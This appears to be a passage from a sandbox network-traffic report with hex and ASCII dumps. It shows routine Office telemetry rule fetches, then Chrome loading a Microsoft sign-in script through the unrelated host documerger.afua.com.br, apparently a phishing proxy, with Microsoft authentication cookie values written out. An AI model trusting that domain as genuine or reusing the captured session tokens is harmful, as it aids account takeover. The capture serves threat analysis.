                                                  2024-11-27 17:10:03 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:03 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:03 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                  ETag: "0x8DC582B9D30478D"
                                                  x-ms-request-id: 38fce8e5-e01e-0052-7679-40d9df000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171003Z-174f7845968pf68xhC1EWRr4h80000000xhg0000000048q8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  88192.168.2.64980513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:03 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:03 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:03 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 408
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                  ETag: "0x8DC582BB9B6040B"
                                                  x-ms-request-id: 97970dc3-901e-008f-6c91-3f67a6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171003Z-174f7845968pf68xhC1EWRr4h80000000xg00000000096ty
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:03 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  89192.168.2.64980713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:03 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:03 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:03 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 416
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                  ETag: "0x8DC582BB5284CCE"
                                                  x-ms-request-id: 8b39e191-d01e-0065-5191-3fb77a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171003Z-174f7845968qj8jrhC1EWRh41s0000000x5000000000dwn5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:03 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  90192.168.2.64980613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:03 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:04 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:03 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 469
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3CAEBB8"
                                                  x-ms-request-id: 1bbe3829-001e-0079-0e66-4012e8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171003Z-174f7845968zgtf6hC1EWRqd8s0000000q70000000008cqe
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:04 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  91192.168.2.64980413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:03 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:04 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:03 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3F48DAE"
                                                  x-ms-request-id: a2105f9f-201e-00aa-1591-3f3928000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171003Z-174f7845968vqt9xhC1EWRgten0000000x8g00000000dfqw
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:04 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  92192.168.2.64980994.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:04 UTC1472OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:05 UTC139INHTTP/1.1 200 OK
                                                  Content-Length: 689017
                                                  Content-Type: application/x-javascript
                                                  Date: Wed, 27 Nov 2024 17:10:04 GMT
                                                  Connection: close
                                                  2024-11-27 17:10:05 UTC16245INData Raw: 0a 21 28 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 74 2c 20 69 2c 20 6f 20 3d 20 6e 5b 30 5d 2c 20 72 20 3d 20 6e 5b 31 5d 2c 20 73 20 3d 20 30 2c 20 63 20 3d 20 5b 5d 3b 20 73 20 3c 20 6f 2e 6c 65 6e 67 74 68 3b 20 73 2b 2b 29 0a 20 20 20 20 20 20 28 69 20 3d 20 6f 5b 73 5d 29 2c 0a 20 20 20 20 20 20 20 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 20 69 29 20 26 26 20 61 5b 69 5d 20 26 26 20 63 2e 70 75 73 68 28 61 5b 69 5d 5b 30 5d 29 2c 0a 20 20 20 20 20 20 20 20 28 61 5b 69 5d 20 3d 20 30 29 3b 0a 20 20 20 20 66 6f 72 20 28 74 20 69 6e 20 72 29 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                  Data Ascii: !(function (e) { function n(n) { for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++) (i = o[s]), Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]), (a[i] = 0); for (t in r) Object.proto
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 6f 63 6b 65 64 3a 20 31 30 30 2c 0a 20 20 20 20 20 20 20 20 54 69 6c 65 73 3a 20 31 30 32 2c 0a 20 20 20 20 20 20 20 20 52 65 6d 6f 74 65 43 6f 6e 6e 65 63 74 3a 20 31 30 33 2c 0a 20 20 20 20 20 20 20 20 46 65 64 43 6f 6e 66 6c 69 63 74 3a 20 31 30 35 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 3a 20 31 30 36 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 5f 50 68 6f 6e 65 53 69 67 6e 69 6e 3a 20 31 30 37 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 46 69 6e 69 73 68 3a 20 31 30 38 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 53 74 72 6f 6e 67 41 75 74 68 3a 20 31 30 39 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 48 49 50 5f 4c 6f 67 69 6e 3a 20 31 31
                                                  Data Ascii: ocked: 100, Tiles: 102, RemoteConnect: 103, FedConflict: 105, Win10Host_Login: 106, Win10Host_Login_PhoneSignin: 107, Win10Host_Finish: 108, Win10Host_StrongAuth: 109, Win10Host_HIP_Login: 11
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 20 28 50 52 4f 4f 46 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 54 79 70 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 53 4d 53 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 20 20 44 65 76 69 63 65 49 64 3a 20 34 2c 0a 20 20 20 20 20 20 20 20 20 20 43 53 53 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 53 51 53 41 3a 20 36 2c 0a 20 20 20 20 20 20 20 20 20 20 43 65 72 74 69 66 69 63 61 74 65 3a 20 37 2c 0a 20 20 20 20 20 20 20 20 20 20 48 49 50 3a 20 38 2c 0a 20 20 20 20 20 20 20 20 20 20 42 69 72 74 68 64 61 79 3a 20 39 2c 0a 20 20 20 20 20 20 20 20 20 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 0a 20 20 20 20 20 20
                                                  Data Ascii: (PROOF = { Type: { Email: 1, AltEmail: 2, SMS: 3, DeviceId: 4, CSS: 5, SQSA: 6, Certificate: 7, HIP: 8, Birthday: 9, TOTPAuthenticator: 10,
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 6e 20 7c 7c 20 22 22 20 3d 3d 3d 20 6e 20 7c 7c 20 28 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 50 2e 70 61 72 73 65 28 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 71 75 65 72 79 20 3d 20 74 2e 71 75 65 72 79 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 73 2e 66 69 6e 64 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 2e 71 75 65 72 79 2c 20 65 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 20 3f 20 74 2e 71 75 65 72 79 5b 69 5d 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 46 72 6f 6d 43
                                                  Data Ascii: n || "" === n || (n = document.location.search); var t = P.parse(n); t.query = t.query || {}; var i = s.findOwnProperty(t.query, e, !0); return i ? t.query[i] : ""; }, appendOrReplaceFromC
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 5d 2f 67 2c 0a 20 20 20 20 20 20 20 20 20 20 67 61 70 2c 0a 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 6e 74 2c 0a 20 20 20 20 20 20 20 20 20 20 6d 65 74 61 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 62 22 3a 20 22 5c 5c 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 74 22 3a 20 22 5c 5c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 6e 22 3a 20 22 5c 5c 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 66 22 3a 20 22 5c 5c 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 72 22 3a 20 22 5c 5c 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 22 27 3a 20 27 5c 5c 22 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 5c 22 3a 20 22 5c 5c 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: ]/g, gap, indent, meta = { "\b": "\\b", "\t": "\\t", "\n": "\\n", "\f": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\", },
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 20 20 20 20 76 61 72 20 6d 20 3d 20 66 2e 61 64 64 28 64 2c 20 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 2e 74 61 72 67 65 74 55 72 6c 20 3d 20 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 61 2e 48 61 6e 64 6c 65 72 2e 63 61 6c 6c 28 6e 2c 20 70 29 2c 20 6e 2e 73 65 6e 64 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 20 20 28 6e 2e 42 65 61 63 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 2c 20 69 2c 20 61 2c 20 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 76 28 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 70 2e 66 6f 72 45 61 63 68 28
                                                  Data Ascii: var m = f.add(d, c); p.targetUrl = m; } } a.Handler.call(n, p), n.sendRequest(); }), (n.Beacon = function (e, t, i, a, o) { var r = [], s = v(!0); p.forEach(
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6e 20 3f 20 28 6c 20 3d 3d 3d 20 70 2e 46 54 45 72 72 6f 72 20 3f 20 68 28 65 2c 20 64 29 20 3a 20 76 28 65 2c 20 64 29 29 20 3a 20 62 28 65 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 67 20 3d 20 22 22 29 2c 20 28 6c 20 3d 20 70 2e 45 72 72 6f 72 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 54 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 6c 20 3d 20 70 2e 54 69 6d 65 6f 75 74 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 28 67 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20
                                                  Data Ascii: n ? (l === p.FTError ? h(e, d) : v(e, d)) : b(e); } function k() { (g = ""), (l = p.Error), (u = ""), (f = ""), v(d); } function T() { (l = p.Timeout), (u = ""), (f = ""), (g = ""), v(d);
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 3d 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 7b 20 63 72 65 64 54 79 70 65 3a 20 6d 2e 4f 6e 65 54 69 6d 65 43 6f 64 65 2c 20 70 72 6f 6f 66 3a 20 65 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 77 69 74 63 68 20 28 28 28 74 2e 70 72 6f 6f 66 2e 69 73 45 6e 63 72 79 70 74 65 64 20 3d 20 21 30 29 2c 20 65 2e 74 79 70 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 53 4d 53 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 56 6f 69 63 65 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 69 73 56 6f 69 63 65 4f 6e 6c 79 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: = n) { var t = { credType: m.OneTimeCode, proof: e }; switch (((t.proof.isEncrypted = !0), e.type)) { case PROOF.Type.SMS: case PROOF.Type.Voice: if (!e.isVoiceOnly) {
                                                  2024-11-27 17:10:05 UTC16384INData Raw: 3d 20 70 2e 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 3f 22 20 2b 20 67 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 77 63 74 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 6f 67 69 6e 4f 70 74 69 6f 6e 73 25 33 44 33 25 32 36 22 20 2b 20 70 2e 65 78 74 72 61 63 74 28 22 77 63 74 78 22 2c 20 22 3f 22 20 2b 20 67 65 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 74 20 3d 20 74 2e 73 75 62 73 74 72 28 31 29 29 2c 20 28 65 20 3d 20 70 2e 61 70 70 65 6e 64 28 65 2c 20 74 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: = p.appendOrReplace( "?" + ge, "wctx", "LoginOptions%3D3%26" + p.extract("wctx", "?" + ge) ); (t = t.substr(1)), (e = p.append(e, t));
